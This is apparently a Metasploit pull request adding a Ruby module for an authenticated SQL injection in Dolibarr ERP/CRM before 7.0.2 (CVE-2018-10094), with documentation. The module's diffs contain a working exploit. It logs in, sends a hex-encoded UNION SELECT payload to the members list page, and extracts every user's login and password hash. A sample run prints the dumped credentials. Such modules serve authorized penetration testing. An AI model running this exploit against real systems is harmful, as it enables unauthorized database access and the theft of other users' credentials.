### PR TITLE
Add Dolibarr ERP/CRM Auxiliary Module

### DIFF
--- a/documentation/modules/auxiliary/sqli/oracle/dolibarr_list_creds.md
+++ b/documentation/modules/auxiliary/sqli/oracle/dolibarr_list_creds.md
@@ -1,0 +1,50 @@
+
+## Description
+
+  This module enables an authenticated user to collect usernames and encrypted passwords of other users of the ERP/CRM Dolibarr software via SQL injection.
+  Checks in the Dolibarr software can be bypassed by url-encoding the SQL commands, provided that the commands do not contain quotes.
+
+## Vulnerable Application
+
+  Dolibarr ERP/CRM Software versions < v7.0.2. Dolibarr v7.0.0 can be found [here](https://www.exploit-db.com/apps/04b0bb4b4864117b5bf47c0fcc737254-dolibarr-7.0.0.tar.gz).
+  By default, user accounts do not have access to view the list of other users of the software. The admin account must first be used to enable the members page, create general users, and give those users permission to access the members page.
+  
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/sqli/oracle/dolibarr_list_creds```
+  4. Do: ```set RHOSTS [IP]```
+  5. Do: ```set USERNAME [USER]```
+  6. Do: ```set PASSWORD [PASS]```
+  7. Do: ```set TARGETURI [URI]```
+  8. Do: ```run```
+  9. You should get a list of credentials
+
+## Scenarios
+
+### Tested on Dolibarr v7.0.0 running on Ubuntu 18.04
+
+```
+
+  msf5 > use auxiliary/sqli/oracle/dolibarr_list_creds
+  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > set username test
+  username => test
+  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > set password blah
+  password => blah
+  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > set targeturi /dolibarr
+  targeturi => /dolibarr
+  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > set rhosts 192.168.37.228
+  rhosts => 192.168.37.228
+  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > run
+
+  [*] Logging in...
+  [+] Successfully logged into Dolibarr
+  [+] Accessed credentials
+  [+] user 8456167fd64d3cda366bda95088dda4d7ea94995
+  [+] test 9d49884ec5f2c8431572a73e3285ceed3f0bdc5b
+  [+] blahBlah e345d4aa5a6a63f828870b0d299dd921d119a5c7
+  [+] someUser fe79b08f9f6a1104a141ff65047087a36d926f12
+  [*] Auxiliary module execution completed
+
+```

--- a/documentation/modules/auxiliary/sqli/oracle/dolibarr_list_creds.md
+++ b/documentation/modules/auxiliary/sqli/oracle/dolibarr_list_creds.md
@@ -1,4 +1,3 @@
-
 ## Description
 
   This module enables an authenticated user to collect usernames and encrypted passwords of other users of the ERP/CRM Dolibarr software via SQL injection.

--- a/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
+++ b/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
@@ -8,9 +8,9 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Module name',
+      'Name'           => 'Dolibarr List Creds',
       'Description'    => %q{
-         This module enables an authenticated user to view the usernames and encrypted passwords of other users in the Dolibarr ERP/CRM via SQL injection.
+         This module enables an authenticated user to collect the usernames and encrypted passwords of other users in the Dolibarr ERP/CRM via SQL injection.
       },
       'Author'         => [
                             'Issam Rabhi',  # PoC
@@ -72,6 +72,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_info(cookies)
+    # union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #
     inject_uri = target_uri.path << "/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%6c%6f%67%69%6e%2c%70%61%73%73%5f%63%72%79%70%74%65%64%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%20%66%72%6f%6d%20%6c%6c%78%5f%75%73%65%72%20%23"
     inject_res = send_request_cgi(
       'method'  =>  'GET',
@@ -90,11 +91,12 @@ class MetasploitModule < Msf::Auxiliary
   def format_results(output)
     credentials = output.scan(/valignmiddle">0<\/div><\/a><\/td>.<td>([a-zA-Z0-9]*)<\/td>.<td>(\S*)<\/td>/m)
 
-    unless credentials
-      fail_with(Failure::NotFound, "No credentials found")
-    end
+    fail_with(Failure::NotFound, "No credentials found") if credentials.empty?
 
-    credentials.each { |i, j| store_valid_credential(user: j, private: i) }
+    credentials.each do |i, j|
+      print_good("#{j} #{i}")
+      store_valid_credential(user: j, private: i)
+    end
   end
 
   def run

--- a/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
+++ b/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Module name',
+      'Description'    => %q{
+         This module enables an authenticated user to view the usernames and encrypted passwords of other users in the Dolibarr ERP/CRM via SQL injection.
+      },
+      'Author'         => [ 'Issam Rabhi' ],  # PoC
+                          [ 'Kevin Locati' ], # PoC
+                          [ 'Shelby Pace' ]   # Metasploit Module
+      'License'        => MSF_LICENSE,
+      'References'     => [
+                            [ 'CVE', '2018-10094' ],
+                            [ 'EDB', '44805']
+                          ]
+    ))
+
+    register_options(
+      OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ])
+      OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])
+    )
+  end
+
+  def login
+
+  end
+
+  def get_info
+
+  end
+
+  def run
+
+  end
+end

--- a/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
+++ b/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
 
     login_uri = target_uri.path << '/index.php' unless target_uri.path.include?('index.php')
     cookies = response.get_cookies
-    print_good(cookies)
+    print_status("Logging in...")
 
     login_res = send_request_cgi(
        'method'  =>  'POST',
@@ -67,24 +67,34 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")
     end
 
-    print_good("Logged in!")
+    print_good("Successfully logged into Dolibarr")
     return cookies
   end
 
   def get_info(cookies)
     inject_uri = target_uri.path << "/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%6c%6f%67%69%6e%2c%70%61%73%73%5f%63%72%79%70%74%65%64%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%20%66%72%6f%6d%20%6c%6c%78%5f%75%73%65%72%20%23"
-    print_good(normalize_uri(inject_uri))
     inject_res = send_request_cgi(
       'method'  =>  'GET',
       'uri'     => normalize_uri(inject_uri),
       'cookie'  => cookies
     )
 
-    print_good(inject_res.body)
+    unless inject_res && inject_res.body.include?('id="searchFormList"')
+     fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
+    end
+
+    print_good("Accessed credentials")
+    format_results(inject_res.body)
   end
 
-  def format_results
+  def format_results(output)
+    credentials = output.scan(/valignmiddle">0<\/div><\/a><\/td>.<td>([a-zA-Z0-9]*)<\/td>.<td>(\S*)<\/td>/m)
 
+    unless credentials
+      fail_with(Failure::NotFound, "No credentials found")
+    end
+
+    credentials.each { |i, j| store_valid_credential(user: j, private: i) }
   end
 
   def run

--- a/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
+++ b/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
@@ -72,8 +72,12 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_info(cookies)
-    # union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #
-    inject_uri = target_uri.path << "/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%6c%6f%67%69%6e%2c%70%61%73%73%5f%63%72%79%70%74%65%64%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%20%66%72%6f%6d%20%6c%6c%78%5f%75%73%65%72%20%23"
+    inject_uri = target_uri.path.end_with?('index.php') ? target_uri.path.gsub('index.php', '') : target_uri.path
+    inject_uri <<= "/adherents/list.php?leftmenu=members&statut="
+    cmd = "1) union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #"
+    cmd = Rex::Text.uri_encode(cmd, 'hex-all')
+    inject_uri <<= cmd
+
     inject_res = send_request_cgi(
       'method'  =>  'GET',
       'uri'     => normalize_uri(inject_uri),

--- a/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
+++ b/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def check_availability
-    login_page = target_uri.path << '/index.php' unless target_uri.path.include?('index.php')
+    login_page = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')
     res = send_request_cgi(
       'method'  =>  'GET',
       'uri'     =>  normalize_uri(login_page)
@@ -48,13 +48,13 @@ class MetasploitModule < Msf::Auxiliary
   def login(response)
     return false unless response
 
-    login_uri = target_uri.path << '/index.php' unless target_uri.path.include?('index.php')
+    login_uri = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')
     cookies = response.get_cookies
     print_status("Logging in...")
 
     login_res = send_request_cgi(
        'method'  =>  'POST',
-       'uri'     =>  normalize_uri(login_uri),
+       'uri'     =>  login_uri,
        'cookie'  =>  cookies,
        'vars_post' =>  {
          'username'  =>  datastore['USERNAME'],

--- a/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
+++ b/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
@@ -4,6 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
@@ -11,31 +12,88 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q{
          This module enables an authenticated user to view the usernames and encrypted passwords of other users in the Dolibarr ERP/CRM via SQL injection.
       },
-      'Author'         => [ 'Issam Rabhi' ],  # PoC
-                          [ 'Kevin Locati' ], # PoC
-                          [ 'Shelby Pace' ]   # Metasploit Module
+      'Author'         => [
+                            'Issam Rabhi',  # PoC
+                            'Kevin Locati', # PoC
+                            'Shelby Pace',  # Metasploit Module
+                          ],
       'License'        => MSF_LICENSE,
       'References'     => [
                             [ 'CVE', '2018-10094' ],
                             [ 'EDB', '44805']
-                          ]
+                          ],
+      'DisclosureDate' => "May 30 2018"
     ))
 
     register_options(
-      OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ])
-      OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])
+      [
+        OptString.new('TARGETURI', [ true, 'The base path to Dolibarr', '/' ]),
+        OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])
+      ])
+  end
+
+  def check_availability
+    login_page = target_uri.path << '/index.php' unless target_uri.path.include?('index.php')
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(login_page)
     )
+
+    return false unless res && res.body.include?('Dolibarr')
+
+    return res
   end
 
-  def login
+  def login(response)
+    return false unless response
 
+    login_uri = target_uri.path << '/index.php' unless target_uri.path.include?('index.php')
+    cookies = response.get_cookies
+    print_good(cookies)
+
+    login_res = send_request_cgi(
+       'method'  =>  'POST',
+       'uri'     =>  normalize_uri(login_uri),
+       'cookie'  =>  cookies,
+       'vars_post' =>  {
+         'username'  =>  datastore['USERNAME'],
+         'password'  =>  datastore['PASSWORD'],
+         'loginfunction' =>  'loginfunction'
+       }
+     )
+
+    unless login_res && login_res.body.include?('id="mainmenua_members"')
+      fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")
+    end
+
+    print_good("Logged in!")
+    return cookies
   end
 
-  def get_info
+  def get_info(cookies)
+    inject_uri = target_uri.path << "/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%6c%6f%67%69%6e%2c%70%61%73%73%5f%63%72%79%70%74%65%64%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%20%66%72%6f%6d%20%6c%6c%78%5f%75%73%65%72%20%23"
+    print_good(normalize_uri(inject_uri))
+    inject_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     => normalize_uri(inject_uri),
+      'cookie'  => cookies
+    )
+
+    print_good(inject_res.body)
+  end
+
+  def format_results
 
   end
 
   def run
+    available_res = check_availability
+    fail_with(Failure::NotFound, "Could not access the Dolibarr webpage") unless available_res
 
+    cookies = login(available_res)
+    fail_with(Failure::NoAccess, "Could not log in. Verify credentials") unless cookies
+
+    get_info(cookies)
   end
 end


### PR DESCRIPTION
This module exploits a SQL injection vulnerability in the Dolibarr ERP/CRM software versions <7.0.2 post authentication.  The checks on certain SQL commands in the Dolibarr software can be bypassed by url encoding the input. This module sends a `Select` command that returns the usernames and encrypted passwords of all users of the software. 

A vulnerable version of this software can be found [here](https://www.exploit-db.com/apps/04b0bb4b4864117b5bf47c0fcc737254-dolibarr-7.0.0.tar.gz).

## Verification

- [x] Start msfconsole
- [x] Do: use auxiliary/sqli/oracle/dolibarr_list_creds
- [x] Do: set RHOSTS [IP]
- [x] Do: set USERNAME [USER]
- [x] Do: set PASSWORD [PASS]
- [x] Do: set TARGETURI [URI]
- [x] Do: run
- [x] You should get a list of credentials

## Scenarios

```

  msf5 > use auxiliary/sqli/oracle/dolibarr_list_creds
  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > set username test
  username => test
  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > set password blah
  password => blah
  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > set targeturi /dolibarr
  targeturi => /dolibarr
  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > set rhosts 192.168.37.228
  rhosts => 192.168.37.228
  msf5 auxiliary(sqli/oracle/dolibarr_list_creds) > run

  [*] Logging in...
  [+] Successfully logged into Dolibarr
  [+] Accessed credentials
  [+] user 8456167fd64d3cda366bda95088dda4d7ea94995
  [+] test 9d49884ec5f2c8431572a73e3285ceed3f0bdc5b
  [+] blahBlah e345d4aa5a6a63f828870b0d299dd921d119a5c7
  [+] someUser fe79b08f9f6a1104a141ff65047087a36d926f12
  [*] Auxiliary module execution completed

```

